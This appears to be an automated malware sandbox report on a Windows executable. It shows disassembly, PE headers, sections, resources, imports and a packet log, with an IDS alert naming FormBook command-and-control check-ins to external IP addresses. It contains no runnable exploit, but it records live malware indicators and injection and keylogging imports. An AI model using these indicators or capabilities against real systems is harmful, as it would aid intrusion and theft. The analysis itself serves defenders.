                                                                              lea esi, dword ptr [esi+08h]
                                                                              movq qword ptr [edi], xmm1
                                                                              lea edi, dword ptr [edi+08h]
                                                                              test esi, 00000007h
                                                                              je 00007F033CD7CB25h
                                                                              bt esi, 03h
                                                                              jnc 00007F033CD7CB78h
                                                                              movdqa xmm1, dqword ptr [esi+00h]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2012 UPD4 build 61030
                                                                              • [RES] VS2012 UPD4 build 61030
                                                                              • [LNK] VS2012 UPD4 build 61030

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x61984.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x6c4c.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xc40000x619840x61a0069692a46b9d66fff68b6bd059c710abfFalse0.9330385723431498data7.9052797595336415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1260000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                              RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                              RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                              RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                              RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                              RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                              RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                              RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                              RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                              RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                              RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                              RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                              RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                              RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                              RT_RCDATA0xcc7b80x58c8bdata1.0003327292876019
                                                                              RT_GROUP_ICON0x1254440x76dataEnglishGreat Britain0.6610169491525424
                                                                              RT_GROUP_ICON0x1254bc0x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0x1254d00x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0x1254e40x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0x1254f80xdcdataEnglishGreat Britain0.6181818181818182
                                                                              RT_MANIFEST0x1255d40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                              Imports

                                                                              DLLImport
                                                                              WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                              USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                              UxTheme.dllIsThemeActive
                                                                              KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-11T09:27:38.335404+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.849714103.224.182.24280TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 11, 2025 09:27:08.154304981 CET4970880192.168.2.8172.67.186.192
                                                                              Jan 11, 2025 09:27:08.159185886 CET8049708172.67.186.192192.168.2.8
                                                                              Jan 11, 2025 09:27:08.159261942 CET4970880192.168.2.8172.67.186.192
                                                                              Jan 11, 2025 09:27:08.169532061 CET4970880192.168.2.8172.67.186.192
                                                                              Jan 11, 2025 09:27:08.174354076 CET8049708172.67.186.192192.168.2.8
                                                                              Jan 11, 2025 09:27:08.792464018 CET8049708172.67.186.192192.168.2.8
                                                                              Jan 11, 2025 09:27:08.792495966 CET8049708172.67.186.192192.168.2.8
                                                                              Jan 11, 2025 09:27:08.792624950 CET4970880192.168.2.8172.67.186.192
                                                                              Jan 11, 2025 09:27:08.792953968 CET8049708172.67.186.192192.168.2.8
                                                                              Jan 11, 2025 09:27:08.792998075 CET4970880192.168.2.8172.67.186.192
                                                                              Jan 11, 2025 09:27:08.795883894 CET4970880192.168.2.8172.67.186.192
                                                                              Jan 11, 2025 09:27:08.800719976 CET8049708172.67.186.192192.168.2.8
                                                                              Jan 11, 2025 09:27:23.861917973 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:23.866754055 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:23.866905928 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:23.882349968 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:23.887125015 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773608923 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773621082 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773709059 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.773781061 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773788929 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773801088 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773806095 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773818016 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773848057 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.773930073 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773936987 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773941994 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.773973942 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.779122114 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.779131889 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.779138088 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.779150963 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.779189110 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.779230118 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.779479027 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.830507040 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.878139019 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878149033 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878164053 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878170013 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878218889 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.878254890 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.878257990 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878267050 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878323078 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.878724098 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878732920 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878774881 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878782034 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878783941 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.878859043 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.878922939 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.879311085 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.879376888 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.879476070 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.879483938 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.879494905 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.879502058 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.879508018 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.879545927 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.880275011 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.880283117 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.880342960 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.880409956 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.880418062 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.880476952 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.880561113 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.880568981 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.880626917 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.881381989 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.881444931 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.966968060 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.966976881 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.967123032 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.983670950 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983674049 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983678102 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983783960 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.983814001 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983820915 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983828068 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983834028 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983840942 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.983958960 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.983959913 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.984148026 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984154940 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984167099 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984213114 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.984348059 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984354973 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984407902 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:24.984874010 CET8049709134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:24.984925032 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:25.437916994 CET4970980192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.445153952 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.450098038 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:26.450187922 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.465841055 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:26.470758915 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306538105 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306564093 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306581974 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306588888 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306596994 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306680918 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306751013 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306756020 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306771040 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306777000 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.306842089 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.306842089 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.306842089 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.306843042 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.311793089 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311805964 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311820030 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311855078 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.311901093 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.311934948 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.393729925 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.410902023 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.410917997 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.410965919 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411005020 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411040068 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411075115 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411082029 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411191940 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411191940 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411418915 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411483049 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411489964 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411550045 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.411577940 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411585093 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.411633968 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.412385941 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412395954 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412410021 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412461042 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.412477016 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412486076 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.412533045 CET4971180192.168.2.8134.0.14.158
                                                                              Jan 11, 2025 09:27:27.413255930 CET8049711134.0.14.158192.168.2.8
                                                                              Jan 11, 2025 09:27:27.413264036 CET8049711134.0.14.158192.168.2.8
